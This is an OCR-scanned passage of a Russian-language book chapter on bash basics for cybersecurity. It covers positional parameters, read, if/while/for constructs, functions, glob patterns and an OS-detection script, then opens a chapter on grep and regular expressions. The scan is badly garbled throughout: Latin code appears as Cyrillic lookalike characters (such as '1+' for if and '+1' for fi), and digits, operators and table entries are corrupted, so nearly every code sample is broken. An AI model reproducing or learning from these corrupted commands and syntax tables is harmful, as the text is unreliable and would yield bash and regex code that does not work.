есһорагатѕ.ѕһ 


Описание: 
Демонстрация доступа к параметрам в баѕћ 


Использование: 
./еспорагт$.$5И <рағат 1> <рағат 2> <рагат 3> 


{Ен 


есһо $# 
есһо $0 
есһо $1 
есһо $2 
есһо $3 


Этот сценарий сначала выводит на экран количество параметров ($#), затем имя 
сценария ($0), а потом первые три параметра. Вот вывод: 


$ ./есһорагатѕ.5һ баѕһ 15 фип 


Е) 
./есһорағатѕ.ѕһ 
Бан 

15 

фип 
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Ввод 


Пользовательский ввод можно получить в БаѕЬ с помощью команды геаа. Она из- 
влекает пользовательский ввод из (т и сохраняет его в указанной переменной. 
Следующий скрипт читает пользовательский ввод в переменную МУ\/АВ и затем 
выводит его на экран: 


геаа МҮМАК 
есһо "$МҮМАВ" 


Вы уже видели, как перенаправить этот ввод из файлов. Далее в главе вы найдете 
гораздо больше информации о геаа и ее параметрах, а также об этом перенаправ- 
лении. 


Условия 


В Баѕћ предусмотрен богатый выбор условных конструкций. Многие условия на- 
чинаются с ключевого слова 1+. Любая команда или программа, вызываемая в Баѕћ, 
может выполнить вывод, но она также всегда возвращает значение, определяющее 
успешное или неудачное выполнение. В оболочке это значение можно найти 
в переменной $? сразу после запуска команды. Возвращаемое значение ө считается 
ѕиссеѕѕ или (гие; любое ненулевое значение считается етот или /абе. В простейшем 
виде в выражении 1+ используются именно эти значения. 


14 ста 
+һеп 

ѕоте ст@$ 
е15е 

оһег стаѕ 
+1 


Использование 0 для {гие и ненулевого значения для ѓаіѕе кардинально отлича- 
ет Бай от многих языков программирования (С++, Зауа, РУоп и др.). Но для 
Баѕћһ это имеет смысл, потому что при неудачном выполнении программы нужно 
вернуть код ошибки (чтобы объяснить, как она вышла из строя), тогда как при 
успешном завершении кода ошибки не будет, то есть мы получим 0. Это отра- 
жает тот факт, что многие вызовы операционной системы возвращают 0, если 
все прошло успешно, или -1 (или другое ненулевое значение), если случилась 
ошибка. Но в БазН есть исключение из этого правила для значений в двойных 
скобках (подробнее об этом — позже). 
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Например, следующий скрипт пытается изменить каталоги в /&тр. Если эта коман- 
да выполнена успешно (возвращает 9), тело инструкции 1+ будет выполнено. 


1+ са /&тр 

ёһеп 
есһо "һеге 15 мһа& 15 іп /%тр:" 
15 -1 

1 


Ваѕћ таким же образом может обрабатывать конвейер команд: 


1+ 15 | егер рае 
{Пеп 
есһо "Ғоипа опе ог тоге ра+ +11е$ һеге" 
е15е 
есһо "по ра+ +11е5 Ғоипа" 
+1 


В случае конвейера при проверке на успех/неудачу именно последняя команда 
определяет, будет ли выбрана ѓгие-ветвь. Вот пример, где этот факт имеет зна- 
чение: 


15 | вгер ра+ | мс 


Эта серия команд будет «истинной», даже если команда вгер не найдет строку ра+. 
Так происходит потому, что команда мс будет успешно выполнена и выведет сле- 
дующее: 


0 ө е 


Этот вывод показывает нулевые строки, нулевые слова и нулевые байты (симво- 
лы), когда от команды вгер нет вывода данных. Это успешный (и, следовательно, 
верный) результат для мс, а не ошибка или сбой. Получено столько строк, сколько 
было дано, даже если для подсчета было предоставлено ноль строк. 


В более типичной форме команды 1+, используемой для сравнения, применяется 
составная команда [[, встроенная команда оболочки [ или тест. Укажите их для 
проверки атрибутов файла или сравнения значений. 


Чтобы проверить, существует ли файл в файловой системе, выполните следующую 
команду: 


1+ [[ -е ФЕІГЕМАМЕ ]] 
ёһеп 

есһо ФЕТЕЕМАМЕ ехіѕ 5 
#1, 
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В табл. 2.1 перечислены дополнительные тесты, которые можно выполнить в от- 
ношении файлов с помощью 1+. 


Таблица 2.1. Операторы проверки файлов 


Оператор проверки файлов |Использование 

-4 Проверка, существует ли каталог 

-е Проверка, существует ли файл 

-г Проверка, существует ли файл и доступен ли он для чтения 

м Проверка, существует ли файл и доступен ли он для записи 

-х Проверка, существует ли файл и является ли он 
исполняемым 


Для проверки того, что переменная $УАІ меньше переменной $МТМ, введите следу- 
ющее: 


ЇР [[ $МАЁ -16 ФМІМ ]] 
+һеп 

есһо "уа1ие 1$ оо ѕта11" 
Ғі 


В табл. 2.2 перечислены дополнительные числовые тесты, которые можно выпол- 
НИТЬ С ПОМОЩЬЮ 11. 


Таблица 2.2. Числовые тестовые операторы 


Числовой тестовый оператор | Использование 

-ед Тест на равенство между числами 

-ві Проверка, больше ли одно число, чем другое 
-16 Проверка, меньше ли одно число, чем другое 


Будьте осторожны с использованием символа <. Рассмотрим следующий код: 


14 [[ $МАЁ < $ОТНА ]] 


В этом контексте оператор «меньше» использует лексическое (алфавитное) 
упорядочение. Это означает, что 12 меньше 2, потому что они сортируются в ал- 
фавитном порядке (так же, кака < Би 1 < 2, но также и 12 < 2). 
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Если вы хотите выполнить численное сравнение со знаком «меньше», исполь- 
зуйте конструкцию с двойными скобками. Предполагается, что все переменные 
являются числовыми, поэтому они так и будут оцениваться. Пустые или не- 
установленные переменные оцениваются как 0. Внутри скобок вам не нужен 
оператор $ для получения значения, за исключением позиционных параметров, 
таких как $1 и $2 (чтобы не путать их с константами 1 и 2). Например: 


1+ (( МАГ < 12 )) 
ёһеп 

есһо "ма1ие $МАІ 15 +оо ѕта11" 
+1 


В двойных скобках воспроизводится числовая (С/Зауа/Ру{поп) логика повышенного 
уровня. Любое ненулевое значение считается истинным, и только ноль — обратное 
значение всем остальным операторам # в Баз — ложным. Например: 


1+ (($? )) ; ЕПеп есһо "ргеу1ои$ соттап@ Ғаі1еа" ; +1 


сделает то, что вы хотите/ожидаете, — если предыдущая команда завершилась 
неудачно, то $? будет содержать ненулевое значение; внутри (( )) ненулевое 
значение будет истинным и ветвь {Пеп будет выполнена. 


В Баѕһћ вы можете даже принимать решения о ветвлении без явной конструк- 
ции і#/&һеп. Команды обычно разделяются новой строкой, то есть вводятся по 
одной команде на строку. Можно достичь того же эффекта, разделяя их точкой 
с запятой. Если вы пишете са $0ТВ ; 1$, ђаѕћ сначала выполнит команду са, а за- 
тем команду 15. 


Две команды также могут быть разделены символами 8& или | |. Если вы напишете 
са $0ІК && 15, команда 15 будет выполняться только в случае успешного выполне- 
ния команды са. Аналогично, если вы введете са $0Ік | | есһо са Ғаі1еа, сообщение 
будет напечатано только в случае сбоя команды са. 


Вы можете использовать синтаксис [ [ для выполнения различных тестов, даже без 
задания в явном виде і: 


[1 -а $0ІК 11 88 15 "$отв" 


Это работает так же, как если бы вы написали следующее: 


1+ [[ -а $018 ]] 
ёһеп 

15 "ФОТВ" 
1 


Глава 2. Основы работы с Баѕћ 37 


При использовании символов && или | | вам нужно сгруппировать несколько опера- 
торов, если в ветви {Неп вы хотите выполнить более одного действия. Например: 


[[ -а $018 ]] || есһо "еггог: по ѕисһ дігесогу: ФОТВ" ; ехі+ 


Эта команда всегда будет завершаться, независимо от того, является $О1В ката- 
логом или нет, так как последней командой стоит ехі. 


Вероятно, вы хотите написать так: 


[[ -а $018 ]] || { есһо "еггог: по зисн дігесёогу: $0ІК" ; ехії ; } 


Здесь скобки сгруппируют оба оператора вместе. 


Циклы 


Цикл с оператором мћі1е по структуре похож на 1+ в том смысле, что для принятия 
решения он может принимать одну команду или конвейер команд, выдающих гие 
или +а15е. В нем также можно использовать квадратные или круглые скобки, как 
в предыдущих примерах. 


В некоторых языках программирования фигурные скобки (символы {}) пред- 
назначены для группировки операторов, которые находятся в теле цикла мһі1е. 
В таких языках программирования, как Руоп, тело цикла и его операторы опре- 
деляются отступом. В Баѕћ операторы сгруппированы между двумя ключевыми 
словами: до и допе. 


Вот простой цикл мИ11е: 


1=9 
мһі1е (( 1 < 1000 )) 
ао 
есһо $1 
Іеі і++ 
аопе 


Предыдущий цикл будет выполняться, пока значение переменной і меньше 1000. 
При каждом выполнении тела цикла на экран будет выводиться текущее значение 
переменной 1. После того как значение переменной і отобразится на экране, цикл 
использует команду 1е* для выполнения 1++ в качестве арифметического выраже- 
ния, увеличивая каждый раз значение 1 на 1. 


Вот более сложный цикл мћїі1е, который выполняет команды как часть своего условия: 


мһі1е 15 | ргер -а рае 
до 
есһо -п 'Ұһеге 1$ а Ғі1е міїһ рағ іп іёѕ пате һеге: ' 
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рма 
Саш 
аопе 


Цикл #ог также доступен в Баѕћ, причем в трех вариантах. 


Организовать простой числовой цикл можно с использованием двойных скобок. 
Он очень похож на цикл ог в С или Јауа, но с двойными скобками и с до и допе 
вместо фигурных скобок: 


Фог ((1=0; 1 < 100; 1++)) 
о 

есһо $1 
аопе 


Цикл ог другого вида используется для перебора всех параметров, которые пере- 
даются сценарию оболочки (или функции в сценарии), то есть $1, $2, $3 ит. д. 
Обратите внимание, что АВб в агр$ . $ можно заменить любым именем переменной 
по вашему выбору. 


Пример 2.2. агдѕ.5ћ 


Тог АКб 
о 

есһо Пеге 15$ ап агритепе: ФАКС 
опе 


Вот вывод для примера 2.2, когда передается три параметра: 
$ ./агрѕ.ѕһ баѕһ 1$ фип 


һеге 15 ап агритепё: баѕћһ 
һеге 15 ап агритепё: 15 
һеге 15 ап агритепё: Ғип 


Наконец, для произвольного списка значений используйте аналогичную форму 
оператора +ог и просто назовите каждое из значений для каждой итерации цикла. 
Этот список может быть задан явно, например, так: 


Тог МАГ іп 20 3 дор реасһ 7 уапі11а 
до 

есһо $\МАЕ 
допе 


Значения, указанные в цикле +ог, также можно генерировать, вызывая другие про- 
граммы или используя другие функции оболочки: 


Ғог МАГ іп $(1$ | вгер рағ) {9..5} 
до 
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есһо $\МАЕ 
аопе 


Здесь переменная МАГ, в свою очередь, будет принимать значение для каждого фай- 
ла, который командой 15 передается в вгер и содержит буквы ра} в своем имени 
(например, дос .р4+ или пофара+11е.+хе), а затем переменная \АЕ примет значение 
каждого числа от 0 до5. Возможно, не очень разумно, чтобы переменная МАГ иногда 
была именем файла, а иногда — одной цифрой, но это всего лишь пример. 


Фигурные скобки можно использовать для создания последовательности чисел 
(или отдельных символов) {#гѕі. 1[а°{..5ер}, где ..5ер может быть положительным 
или отрицательным и является опциональным. В последних версиях Баѕћ указа- 
ние 0 приведет к тому, что числовые значения будут дополнены нулем до той же 
длины. Например, последовательность {090..104..2} будет заполнена четными 
цифрами, находящимися в диапазоне от 090 до 104 включительно, причем каждая 
цифра будет представлена в виде трех чисел. 


Функции 


Синтаксис функции в Баѕћ следующий: 


Фипс1оп муфип () 


{ 


# это тело функции 


} 


Не все эти компоненты обязательны. Вы можете указать или Ғипс+іоп, или (). Мы же 
будем использовать и ключевое слово, и скобки в основном для удобства чтения. 


Есть несколько важных факторов, которые следует учитывать при работе с функ- 
циями Баѕћ. 


О Если указанная внутри функции команда не объявлена как 1оса1, переменные 
в видимой области являются глобальными. Цикл Рог, устанавливающий и уве- 
личивающий значение і, можно использовать в любом месте вашего кода. 


О Скобки — это наиболее популярные символы для группировки в теле функции, 
но разрешен любой из составных синтаксисов команд оболочки. Хотя зачем, 
например, запускать функцию в подоболочке? 


О Перенаправление ввода/вывода (1/О), заключенное в фигурные скобки, рас- 
пространяется на все операторы внутри функции. Примеры такого перенаправ- 
ления будут приведены в следующих главах. 
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О В определении функции параметры не объявляются. Какие бы аргументы 
и их количество при вызове функции ни приводились, они передаются этой 
функции. 


Функция вызывается (активизируется) так же, как и любая команда в командной 
оболочке. Определив туфип как функцию, вы можете вызвать ее следующим об- 
разом: 


туфип 2 /агЬ "14 уеаг$" 


Эта команда вызывает функцию му+ип, предоставляя ей три аргумента. 


Аргументы функции 


Внутри определения функции аргументы упоминаются так же, как параметры 
сценария оболочки, то есть как $1, $2 и т. д. Это означает, что аргументы «скрыва- 
ют» параметры, первоначально переданные в сценарий. Если вы хотите получить 
доступ к первому параметру скрипта, то перед вызовом функции нужно сохранить 
$1 в переменной (или передать его в качестве параметра функции). 


Другие переменные установлены соответственно: $# выдает количество аргументов, 
переданных функции, хотя обычно мы получаем количество аргументов, переданных 
самому сценарию. Единственное исключение — $6, которая в функции не изменяет- 
ся. Она сохраняет свое значение как имя скрипта, а ие функции. 


Возвращаемые значения 


Функции, как и команды, должны возвращать статус: 09, если все идет хорошо, 
и значение, отличное от нуля, если произошла ошибка. Чтобы возвращать другие 
типы значений (например, пути или вычисленные значения), можно установить 
для хранения значения переменную, потому что переменные являются глобаль- 
ными, если они не объявлены локально внутри функции. Кроме того, вы можете 
отправить результат в ѕйоиѓ, то есть напечатать ответ. Только не пытайтесь делать 
и то и другое одновременно. 


Если ваша функция выводит ответ, вы можете использовать этот вывод как часть 
конвейера команд (например, туѓипс агдз | пех ѕїер | ес). Или можете захватить 
вывод следующим образом: ВЕТУАІ = $ (туѓипс агдѕ). В обоих случаях функция 
будет выполняться в подоболочке, а не в текущей оболочке. Таким образом, изме- 
нения любых глобальных переменных будут эффективны только в этой подоболочке, 
а не в основном экземпляре оболочки. Фактически они будут потеряны. 
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Шаблон соответствия в Баѕћ 


Когда в командной строке нужно перечислить много файлов, не обязательно вво- 
дить имя каждого. Ваѕћ обеспечивает сопоставление с шаблоном (иногда называ- 
емое подстановкой знаков (жі4сагііпе)), чтобы вы могли указать набор файлов 
с шаблоном. 


Самый простой подстановочный знак — символ звездочки (*), который будет со- 
ответствовать любому количеству любых символов. Поэтому, когда используется 
только подстановочный знак, он сопоставляет все файлы в текущем каталоге. 
Звездочку также можно указывать вместе с другими символами. Например, *.Ёхі 
соответствует всем файлам в текущем каталоге, имена которых заканчиваются че- 
тырьмя символами .ёх. Шаблон /изг/61п/5* будет соответствовать всем файлам 
в /иѕг/Біп, которые начинаются с буквы в. 


Другой специальный символ для сопоставления — вопросительный знак (?), ко- 
торый соответствует одному символу. Например, зоигсе.? будет соответствовать 
ѕоигсе.с или зоигсе. о, но не ѕоигсе.ру или зоигсе. срр. 


Последний из трех подстановочных символов для сопоставления — квадратные 
скобки: [ ]. Сопоставление может быть выполнено с любым из символов, пере- 
численных в квадратных скобках. Так, шаблон х[ абс ]у соответствует любому или 
всем файлам с именами хау, хБу или хсу при условии, что они существуют. Вы мо- 
жете указать диапазон в квадратных скобках, например: [0-9] для всех цифр. 
Если первый символ в скобках — восклицательный знак (!) или «шляпка» (^), то 
шаблон определяет все что угодно, кроме оставшихся символов в скобках. Напри- 
мер, [аеіои] будет соответствовать гласным буквам, тогда как [^аеіои] — любым 
символам (включая цифры и знаки пунктуации), кроме гласных. 


Как и для диапазонов, в фигурных скобках вы можете указывать классы символов. 
В табл. 2.3 перечислены классы символов и их описания. 


Таблица 2.3. Классы символов для сопоставления с образцом 


Класс символов Описание 

[гањи] Алфавитно-цифровой 

[:аІрћа:] Буквенный 

[:аѕсі:] АЅСП (американский стандартный код для обмена информацией) 
[:Ыаһк:] Пробел и символ табуляции 

[:с1:] Управляющий символ 

[41216] Число 


Продолжение =? 
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Таблица 2.3 (продолжение) 


Класс символов Описание 

[.этарВ:] Все что угодно, кроме управляющих символов и пробела 
]о\ег:] Символы в нижнем регистре 

[:ргіпе:] Все, кроме управляющих символов 

[:рипсё] Символы пунктуации 

[:ѕрасе:] Пробелы, включая разрывы строк 

[:иррег:] Символы в верхнем регистре 

[:%уога:] Буквы, цифры и символ подчеркивания 

[:хаіеїс] Шестнадцатеричный символ 


Классы символов указываются как [:сіг1:], но в дополнительных квадратных 
скобках (поэтому у вас есть два набора скобок). Например, шаблон * [ [ : рипс*: ]]јре 
будет соответствовать любому имени файла, имеющему любое количество любых 
символов, за которыми следуют знаки пунктуации, а за ними — буквы јре. Таким 
образом, он будет соответствовать файлам с именами мом! 2ре, ѕоте, јрв или 
рһћо+о.јре, но не файлу +һіѕ.15ѕ.тујре, потому что прямо перед јре нет знака пун- 
ктуации. 


Более сложные виды сопоставления с образцом станут доступными, если вы до- 
бавите параметр ехЕё1о6 оболочки (например: $Пор* -5 ехёв10о6), чтобы можно 
было повторять или отменять шаблоны. В наших примерах сценариев они не по- 
надобятся, но мы рекомендуем вам узнать о них больше (например, посетив 
тап-страницу Баѕћ). 


При работе с оболочкой для сопоставления с шаблоном обратите внимание на 
следующее. 


О Шаблоны не являются регулярными выражениями (что такое регулярное вы- 
ражение, вы узнаете в главе 3), не путайте их. 


О Шаблоны сопоставляются с файлами в файловой системе. Если шаблон начи- 
нается с указания пути (например, /иѕг/116), сопоставление будет выполнено 
для файлов в заданном каталоге. 


о Если не найдено ни одного шаблона, то в качестве символьных литералов 
имени файла оболочка будет использовать специальные символы соответствия 
шаблону. Например, если ваш скрипт указывает на есһо дата > /ётр/*.ои+, 
а в каталоге /+тр нет файла, заканчивающегося на .оиё, то оболочка в каталоге / 
{тр создаст файл с именем *.оиё. Удалите его следующим образом: гт /Етр/\*. 
ои. Слеш служит для указания оболочке не использовать сопоставление с об- 
разцом по символу *. 
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О Внутри кавычек (двойных или одинарных) не происходит сопоставления с ша- 
блоном. Поэтому, если ваш сценарий передает команду есһо даќа > "/+тр/* .ои*", 
то будет создан файл с именем /+тр/*.оц* (мы рекомендуем избегать таких 
действий). 


Точка (.), в отличие от регулярных выражений, здесь является обычным символом 
и не имеет особого значения при сопоставлении с шаблоном оболочки. 


Написание первого сценария: определение 
типа операционной системы 


Теперь, когда мы рассмотрели основы командной строки и Баѕћ, вы готовы на- 
писать свой первый скрипт. Оболочка Баѕћ доступна на различных платформах, 
включая пих, \ш4о\з, МасО$ и СК Ваз. Когда вы в будущем начнете писать 
более сложные скрипты, очень важно знать, с какой операционной системой вы 
работаете, так как у каждой из них набор доступных команд немного отличается. 
Скрипт озде*ес* . эй, показанный в примере 2.3, поможет вам определить тип ОС. 


Задача сценария — найти команду, уникальную для конкретной операционной 
системы. Ограничением выступает то, что в любой операционной системе админи- 
стратор может создать и добавить команду с таким названием, поэтому сценарий 
нельзя считать надежным. 


Пример 2.3. оѕеѓесі.5ћ 


#!/61п/Ба$й - 

# 
ВазИ и кибербезопасность 
озефес+.$И 


# 
# 
# 
# Описание: 

# Определение типа ОС: М5 -Міпаӣомѕ /іпих/Мас05 
# 

# 

# 

# 


Использование: баѕһћ оѕӣе+ес+. ѕһ 
вывод будет одним из таких: 11пих МЅ5Аіп тас05 


1+ уре -+ меуЁиі1 &> /4еу/пи11 [1] 
+һеп 

05=М5Міп 
е1ї# +уре - ѕсиі1 &> /4еу/пи11 [2] 
+һеп 


Оѕ=мас05 
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е1ѕе 
0$=Е1пих 

+1 

есһо $05 


© Мы используем встроенную в Баѕћ команду +уре, чтобы сообщить, к какому 
виду команд (псевдоним, ключевое слово, функция, встроенная команда или файл) 
относятся ее аргументы. Опция -* говорит, что ничего не нужно выводить, если 
команда не найдена. В этом случае возвращается значение +а15е. Мы перенаправ- 
ляем весь вывод (и ѕйоиѓ, и $&4егг) в /аеу/пи11, тем самым отбрасывая его, так как 
хотим знать только, была ли найдена команда меми*11. 


Ө Если меуёџи+і1 не найдена, мы снова используем встроенную в Баѕћ команду +уре, 
но на этот раз ищем команду ѕси+і1, которая доступна только в системах МасО5. 


Выводы 


Оболочку Баѕћ можно рассматривать как язык программирования с переменными 
и операторами і#/&һеп/е1ѕе, циклами и функциями. У Баѕћ свой синтаксис, во 
многом схожий с синтаксисом других языков программирования. Но у синтаксиса 
Баѕћ есть некоторые отличия. Если вы их не учтете, то при составлении команд 
можете совершить ошибку. 


У Баѕһ есть свои достоинства, такие как простой вызов других программ или 
соединение последовательностей других программ. У него также есть свои недо- 
статки: Баѕћ не может выполнять операции над числами с плавающей точкой и не 
поддерживает (даже частично) сложные структуры данных. 


О Баѕћ можно узнать гораздо больше, чем мы можем рассказать в одной главе. 
Рекомендуем вам несколько раз прочитать тап-страницу Баѕћ и просмотреть 
книгу Баѕһћ СоокБоок от Карла Олбинга (Сай АІбіпд) и Дж. П. Воссена (ЈР Моѕѕеп) 
(О’Вейу) (ПЕр://Ьу/Ба$Н_сооКБоок_2Е). 


В этой книге мы описываем и используем множество команд и функций Баѕћ в кон- 
тексте операций кибербезопасности. Далее мы подробнее рассмотрим некоторые 
из упомянутых здесь функций и другие более продвинутые или малоизвестные 
инструменты. Читайте о них, практикуйтесь и используйте их для собственных 
сценариев. 


В следующей главе мы рассмотрим регулярные выражения — они являются важ- 
ным компонентом многих команд, которые мы будем обсуждать на протяжении 
всей книги. 
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Упражнения 


1. 


9. 


Поэкспериментируйте с командой ипате и посмотрите, что она выводит в раз- 
личных операционных системах. Перепишите сценарий оздетес* . ѕћ, чтобы 
использовать команду ипаме с одной из ее опций. Внимание: в разных операци- 
онных системах не все опции доступны. 


Измените сценарий оѕӣетес+. ѕһ, чтобы использовать функцию. Поместите 
логику 1+ /&Пеп/е15е внутрь функции, а затем вызовите из скрипта. У самой 
функции не должно быть вывода. Сделайте вывод из основной части скрипта. 


Установите для сценария оѕаӣеїесі.ѕһ права на выполнение (см. тап сһтоа), 
чтобы можно было запускать его без использования БазН в качестве первого 
слова в командной строке. Как вы теперь вызываете скрипт? 


Напишите скрипт с именем агвсп* . 5, который сообщает количество передан- 
ных в него аргументов. 


® Измените свой скрипт, чтобы он также выводил каждый аргумент по одному 
в строке. 


® Измените скрипт так, чтобы каждый аргумент помечался следующим об- 
разом: 


$ Баѕһ агвспф.5В {01$ 15$ а "геа1 1іме" Ее 


{Пеге аге 5 агвимепе$ 


агр1: {01$ 
агр2: 15 

агёЗ: а 

агр4: геа1 11\е 
аг55: Теѕї 

$ 


Измените агеспі. ѕһ так, чтобы он выводил только четные аргументы. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт һірѕ://Лумм.гарійсубегорѕ.соту/. 


Регулярные 
выражения 


Регулярные выражения (тевшаг ехргеѕѕіопѕ, сокращенно герех) — это мощное 
средство для описания текстового шаблона, который согласовывается с помощью 
различных инструментов. В Баз регулярные выражения допустимы в составной 
команде [[ при использовании сравнения =~, например, в операторе 1+. Однако 
регулярные выражения являются важной частью более широкого инструментария 
для таких команд, как вгер, амк и особенно ѕеа. Это очень мощные команды, по- 
этому их необходимо знать. 


Во многих примерах главы мы будем использовать файл +го$* .&х® с семью — да, 
семью — строками текста (пример 3.1). 


Пример 3.1. Файл їгоѕі.їхї 


1 Тимо гоааѕ діуегреа іп а уе11ом моод, 
2 Апа зоггу І сои1а пої +гауе1 Бон 

3 Апа Бе опе +гауе1ег, 1опё І $фооа 

4 Апа Іоокеа аомп опе аз Фаг аѕ І сои1а 
5 То мпеге 1% беп іп һе ипаегргомћ; 
6 
я 


Ехсегре гот Тһе Коаа № Такеп Бу ВобегЕ Егоѕ+ 


Воспользуемся содержимым файла +#гоѕ+.іх+ для демонстрации возможностей 
регулярных выражений при обработке текстовых данных. Этот текст был вы- 
бран потому, что для его понимания не нужны предварительные технические 
знания. Если вы работаете в операционной системе Ұіпаоҳуѕ, создайте в кор- 
невом каталоге папку /Поте, а в ней — текстовый файл с именем #гоѕ&.х+. 
Добавьте в него приведенный в примере 3.1 текст. В операционной системе 
Тлпих каталог /һоте создан по умолчанию, вам нужно только создать текстовый 
файл +го$*.хф. 
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Используемые команды 


Мы представляем семейство команд вгер для демонстрации основных шаблонов 
регулярных выражений. 


агер 


Команда вгер выполняет поиск по содержимому файлов с помощью заданного 
шаблона и выводит любую строку, которая ему соответствует. Чтобы использо- 
вать команду вгер, вам нужно указать шаблон и одно или несколько имен файлов 
(имена файлов могут быть переданы через канал передачи данных). 


Общие параметры команды 


О -с — вывести количество строк, соответствующих шаблону; 


О -Е — включить расширенное регулярное выражение; 


О -+ — читать шаблон поиска, находящийся в предоставленном файле. Файл 
может содержать несколько шаблонов, причем каждая строка включает в себя 
один шаблон; 


-1 — игнорировать регистр символов; 
-1 — вывести только имя файла и путь, по которому был найден шаблон; 
-п — вывести номер строки файла, в которой был найден шаблон; 


-Р — включить механизм регулярных выражений Реті; 


оооеоо 


-К, -г — выполнить рекурсивный поиск подкаталогов. 
Пример команды 


В общем случае вгер используется следующим образом: вгер параметры шаблон 
имена файлов. 


Для поиска в каталоге /поме и во всех его подкаталогах файлов, содержащих слово 
раззшотА независимо от регистра, выполните команду: 


5гер -К -1 'раѕѕмога' /һоте 


адгер и едгер 


Команда вгер поддерживает расширенный синтаксис для шаблонов регулярных 
выражений (мы обсудим их далее). Есть три способа сообщить команде ргер, что 
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вам нужно специальное значение для определенных символов: 1) добавить перед 
этими символами обратный слеш (\); 2) сообщить вгер, что вам нужен специ- 
альный синтаксис (без обратного слеша), используя при вызове веер параметр -Е; 
3) добавить команду евгер, которая представляет собой скрипт, вызывающий вгер 
как эгер -Е. 


Единственные символы, на которые влияет расширенный синтаксис, — это +, {, 
[, (и). В следующих примерах мы используем взаимозаменяемость вгер и евгер — 
это один и тот же двоичный код. В зависимости от того, какие специальные симво- 
лы нам нужны, мы выбираем тот пример, который кажется наиболее подходящим. 
Особую мощь команде вгер придают специальные символы, или метасимволы. 
Поговорим о наиболее популярных из них. 


Метасимволы 
регулярного выражения 


Регулярные выражения — это шаблоны, созданные с использованием последова- 
тельности символов и метасимволов. Такие метасимволы, как знак вопроса (?) 
и звездочка (*), помимо непосредственного значения, в регулярном выражении 
имеют специальное значение. 


Метасимвол «.» 


В регулярном выражении точка (.) представляет собой один символ подстановки. 
Она будет соответствовать любому символу, кроме символа новой строки. Как вид- 
но из следующего примера, если мы попытаемся найти соответствие шаблону Т.о, 
будет возвращена первая строка файла +го5*.+х+, поскольку в ней содержится 
слово Тоо: 


$ ргер 'Т.о' #Ғгоѕі.Ехі 


1 Тмо гоааѕ діуегреа іп а уе11ом моод, 


Обратите внимание, что строка 5 не возвращается, хотя в ней содержится слово То. 
Данный шаблон позволяет любому символу появляться между символами Ти о. Как 
указывалось ранее, между символами Ти о должен находиться еще один символ 
(это обозначается символом подстановки в виде точки). Шаблоны регулярных 
выражений также чувствительны к регистру, поэтому строка З файла не возвра- 
щается, хотя она содержит слово ѓоо. Если вы хотите трактовать этот метасимвол 
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как символ точки, а не как символ подстановки, то добавьте перед ним обратный 
слеш (\.). 


Метасимвол «?» 


В регулярном выражении знак вопроса (?) делает любой предшествующий ему 
символ необязательным; то есть символ сопоставляется один раз, далее игнори- 
руется. Добавив этот метасимвол к предыдущему примеру, вы увидите, что вывод 
будет другим: 


$ ергер 'Т.?о' ҒгоѕЕ.хі 


1 Тмо гоааѕ діуегреа іп а уе11ом мооа, 
5 То мпеге 1% беп іп һе ипдегёгомеИ; 


На этот раз мы получим две строки: 1 и 5. Это потому, что метасимвол . стал 
необязательным, так как за ним стоит метасимвол ?. Данный шаблон будет соот- 
ветствовать любой трехсимвольной последовательности, которая начинается с Т 
и заканчивается о, а также двухсимвольной последовательности То. 


Обратите внимание, что мы здесь использовали команду евгер. С тем же успехом 
мы могли ввести команду вгер -Е или «обычную» вгер с немного измененным 
шаблоном Т.\?0, поставив обратный слеш перед вопросительным знаком, чтобы 
придать ему специальное значение. 


Метасимвол «*» 


В регулярных выражениях звездочка (*) — это специальный символ, который со- 
ответствует предыдущему элементу неограниченное количество раз. Он похож на 
символ ?, но главное отличие в том, что предыдущий элемент может встречаться 
более одного раза. Вот пример: 


$ эгер 'Т.*о' Его. хе 


1 Тмо гоааѕ а1уегвеа іп а уе11ом мооа, 
5 То мһеге 1% беп іп һе ипаегргомЁћ; 
7 Ехсегре Ғгот Тһе КоаЯ № Такеп бу Кобеге Егоѕ+ 


Добавив метасимвол .* в предыдущем шаблоне, мы подразумеваем, что между 
символами Ти о может быть любое количество любых символов. Следовательно, 
после выполнения заданной команды результатом станет и последняя строка, со- 
держащая набор символов Тһе Во. 
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Метасимвол «+» 


Метасимвол плюс (+) работает так же, как и *, за исключением того, что пре- 
дыдущий ему элемент должен встретиться хотя бы однажды. Другими словами, 
он соответствует предыдущему элементу, который появляется один раз или 
более: 


$ ергер 'Т.+о' Рго$*. 4х 


г Тмо гоааѕ Ӣіуегреа іп а уе11ом моод, 
5 То мһеге 14 Бепі іп һе ипдегргоиһ; 
7 Ехсегре гот Тһе Коаа № Такеп Бу ВобегЕ Егоѕ+ 


Предыдущий шаблон задает один или несколько символов, которые появляются 
между Ти о. В первой строке текста в слове Тео между буквами Ти о находится 
один символ ®. Вторая строка не соответствует То, как в предыдущем примере; 
скорее, шаблон соответствует строке с гораздо большим количеством символов — 
вплоть до символа о в конце фразы. Последняя строка также подходит, поскольку 
содержит шаблон Тһе Во. 


Группирование 


Для группирования символов можно использовать скобки. Помимо прочего, это 
позволит нам рассматривать символы, расположенные внутри скобок, как один 
элемент, на который далее можно ссылаться. Вот пример группировки: 


$ ергер 'Апа бе опе (ѕёгапвег |+гауе1ег), 1опё І ѕ&оой' Ғгоѕі.Ехі 


З Апа Бе опе Ёғауе1ег, Іопе І $фооа 


Для создания шаблона в примере мы используем скобки и логический оператор 
ИЛИ, который представлен символом вертикальной черты (|). Соответствие за- 
данному шаблону найдено в строке 3: в ней есть слово ѓғаоеіег. Но даже если ѓғаоеіег 
будет заменено словом ѕѓғапрет, это будет соответствовать шаблону. 


Квадратные скобки и классы символов 


В регулярных выражениях квадратные скобки [ ] предназначены для определения 
классов и списков допустимых символов. Используя эту конструкцию, вы можете 
точно указать, какие символы в данной позиции в шаблоне совпадают. Это осо- 
бенно полезно при попытке проверить пользовательский ввод. Для краткости при 
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указании диапазона можно добавить тире, например [а-ј]. Последовательность 
этих диапазонов зависит от местных стандартов и определяется с помощью сорти- 
ровки в алфавитном порядке. Для условного региона С шаблон [а-ј] будет соот- 
ветствовать одной из букв от а до]. В табл. 3.1 приведен список распространенных 
примеров использования классов символов и диапазонов. 


Таблица 3.1. Диапазоны символов регулярных выражений 


Пример Значение 

[аре] Соответствует только символу а, или Б, или с 

[1—5] Соответствует цифрам в диапазоне от 1 до 5 

[а8-2А-4] Соответствует любой строчной или прописной букве от а до 2 

[0-9 +-*/] Соответствует числам или указанным четырем математическим символам 
[0—-9а-ЃА-Е] Соответствует шестнадцатеричному символу 


Будьте осторожны при определении диапазона для цифр: он может быть от 0 до 9. 
